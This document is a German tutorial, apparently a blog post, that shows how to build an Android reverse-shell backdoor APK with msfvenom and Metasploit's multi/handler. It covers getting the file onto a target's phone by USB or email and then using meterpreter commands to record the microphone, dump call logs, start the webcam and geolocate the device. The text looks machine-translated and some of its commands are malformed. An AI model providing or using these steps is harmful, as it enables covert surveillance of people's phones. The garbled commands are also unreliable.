Ein Android-Smartphone ist häufig ein Gateway zu den meisten kommerziellen IoT-Geräten. Ein Nest Smoke-Alarm wird über eine relevante Android-App verwaltet. So ist ein Nest-Thermostat zur Temperaturregelung. Intelligente Schlösser, Türklingelkameras – auf fast alle intelligenten Geräte kann über Alexa oder andere Master-Apps zugegriffen werden. Was wäre, wenn jemand Fernzugriff auf ein solches Android-Telefon erhalten würde? Sie denken, das ist unmöglich? Zu diesem Zweck geben wir eine grundlegende Demo, wie ein Kali Linux-Metasploit verwendet werden kann, um einen Backdoor-Eintrag für Ihr Android-Telefon zu erstellen.
Hinweis: Dieses Tutorial richtet sich an Sicherheitsforscher und Bastler. Wir empfehlen nicht, das Telefon von Personen ohne deren Erlaubnis zu hacken.
Hintergrund
Bevor Sie mit der Arbeit an Kali Linux beginnen, müssen Sie sich zunächst mit dem Konsolenterminal vertraut machen.
Es enthält eine umfassende Liste von Tools, die auf die Firmware oder das Betriebssystem eines Geräts abzielen.
Hier verwenden wir eines der gängigen Tools “MSFVenom” um einen Virus in ein Android-Handy einzufügen. Basierend auf vom Benutzer ausgewählten Optionen werden mehrere Arten von Nutzdaten generiert. Der Exploit funktioniert auf vielen Plattformen, einschließlich Windows, Android, OpenBSD, Solaris, JAVA, PHP und Gaming-Hardware.
Starten eines Android Metasploit
Die folgenden Schritte zeigen, wie Sie MSFVenom auf ein Kali Linux-System herunterladen.
Starten Sie das Terminal und geben Sie den folgenden Befehl ein.
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > /root/LOCATION/hackand.apk
Hier wird die Nutzlast mit einer Exploit-Erweiterung namens „Meterpreter“ gestartet.
Öffnen Sie ein neues Konsolenterminal und geben Sie ein, um die IP-Adresse des Listener-Hosts zu ermitteln ifconfig
. Normalerweise wird Port 4444 für Trojaner, Exploits und Viren zugewiesen.

Sobald die IP-Adresse ermittelt wurde, kehren Sie zum vorherigen Bildschirm zurück und geben Sie die Details ein.
Die Datei „hackand.apk“ wird auf dem Desktop gespeichert und ist der wichtigste Backdoor-Exploit für Android-Telefone.

Starten Sie im nächsten Schritt “msfconsole”, ein gängiges Penetrationstest-Tool, das mit Kali Linux verwendet wird. Geben Sie dazu ein service postgresql start
gefolgt von msfconsole
. PostgreSQL bezieht sich auf eine Datenbank, in der die Konsole gespeichert wurde.

Sobald das Penetrationstool bereit ist, können Sie den verbleibenden Exploit starten.

Als nächstes wird eine ausführbare Datei namens “Multi-Handler” verwendet.
use multi/handler
In der Abbildung unten finden Sie Informationen zum Verbinden des Exploits mit der Konsole. Es werden die gleichen IP-Adressen und Portnummern verwendet.

In der nächsten Phase wird der msfvenom-Exploit gestartet und mit einem einfachen initialisiert exploit
Befehl. Jetzt müssen wir ein Ziel finden, das ein Android-Handy sein wird.

Kali Linux Terminal mit Android Phone verbinden
Die zuvor heruntergeladene Datei hackand.apk ist nur 10 KB groß. Sie müssen einen Weg finden, um die Datei in das Telefon des Ziels einzufügen. Sie können den Virus über USB oder einen temporären E-Mail-Dienst übertragen.
Im Allgemeinen lehnen Webmail-Anbieter wie Google Mail oder Yahoo die Übertragung dieser mit Viren infizierten Datei ab.
Android warnt Sie, bevor Sie die Software einfügen. Die Installation dauert jedoch weniger als 20 Sekunden, da Sie nur das Risiko ignorieren und installieren müssen. Dies macht die Bedrohung etwas ernst, wenn sich Ihr Telefon im Entsperrmodus befindet.

Wie hier gezeigt, kann das Telefon erheblich beschädigt werden, z. B. durch Ändern des Speicherinhalts, Verhindern des Ruhezustands des Telefons, Verbinden und Trennen von WLAN, Festlegen von Hintergrundbildern und mehr.

Sobald die APK-Datei installiert ist, kann sie im Telefon geschickt getarnt werden.

Jetzt können Sie viele Befehle wie die folgenden auf dem Kali Linux-Terminal verwenden, um das Telefon zu steuern. Sie müssen sich nicht wirklich an sie erinnern, da die Liste über eine einfache Liste verfügbar ist help
Option in meterpreter
.
-
record_mic
: Aufnahme des Mikrofons -
dump calllog
: Anrufliste abrufen -
webcam_chat
: Starten Sie einen Video-Chat -
geolocate
: Ermittelt den aktuellen Standort des Telefons
Die meisten fortschrittlichen Android-Telefone verhindern, dass diese schädliche App installiert wird. Dieser Exploit funktioniert also im Allgemeinen mit älteren Android-Modellen.
Gedanken
In diesem Tutorial haben wir eine grundlegende Strategie für die Verwendung von Kali Linux gesehen, um Zugriff auf ein Android-Smartphone zu erhalten. Obwohl dies ein sehr einfacher Exploit ist, hat er große Auswirkungen auf die IoT-Sicherheit.
Was halten Sie von Kali Linux-Exploits? Werden Sie in Bezug auf die Sicherheit Ihres Telefons vorsichtiger sein? Lass es uns in den Kommentaren wissen.